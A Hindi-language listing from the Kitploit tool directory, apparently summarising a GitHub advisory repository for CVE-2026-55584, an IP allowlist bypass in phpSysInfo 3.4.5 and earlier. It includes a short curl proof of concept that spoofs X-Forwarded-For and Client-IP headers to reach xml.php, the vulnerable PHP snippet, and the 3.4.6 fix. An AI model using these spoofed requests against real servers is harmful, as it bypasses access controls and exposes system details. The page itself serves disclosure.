Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-55584 — CVE-2026-55584 — phpSysInfo IP अनुमति-सूची बाईपास | Kitploit
उपकरण/GitHubGitHub/mirackayikci/cve-2026-55584
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubmirackayikci/cve-2026-55584

CVE-2026-55584

CVE-2026-55584 — phpSysInfo IP अनुमति-सूची बाईपास

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-55584 - phpSysInfo IP अनुमति सूची बाइपास

CWE-290, CVSS 7.5 (उच्च), phpSysInfo <= 3.4.5

संदर्भ: GHSA-786w-p5pm-cvgh, CVE.org

PSI_ALLOWED क्लाइंट IP को हमलावर-नियंत्रित X-Forwarded-For (फिर Client-IP) हेडर से हल करता है, इससे पहले कि यह REMOTE_ADDR पर वापस आए। कोई विश्वसनीय-प्रॉक्सी अवधारणा नहीं है, इसलिए अनुमत IP को स्पूफ करने से अनुमति सूची विफल हो जाती है और xml.php के माध्यम से पूर्ण सिस्टम जानकारी उजागर होती है।

PoC:

root@kitploit:~
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php                                # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php  # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8"       http://target/xml.php  # bypass, full XML

कमजोर कोड (read_config.php):

root@kitploit:~
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];   // only trustworthy source, checked last
}

ठीक किया गया 3.4.6 (019fa2d): डिफ़ॉल्ट रूप से REMOTE_ADDR; कॉन्फ़िगर किए गए विश्वसनीय प्रॉक्सी से ही X-Forwarded-For / Client-IP का सम्मान करें।

रिपोर्ट किया गया: Muhammed Mirac Kayıkci

टूल डाउनलोड करें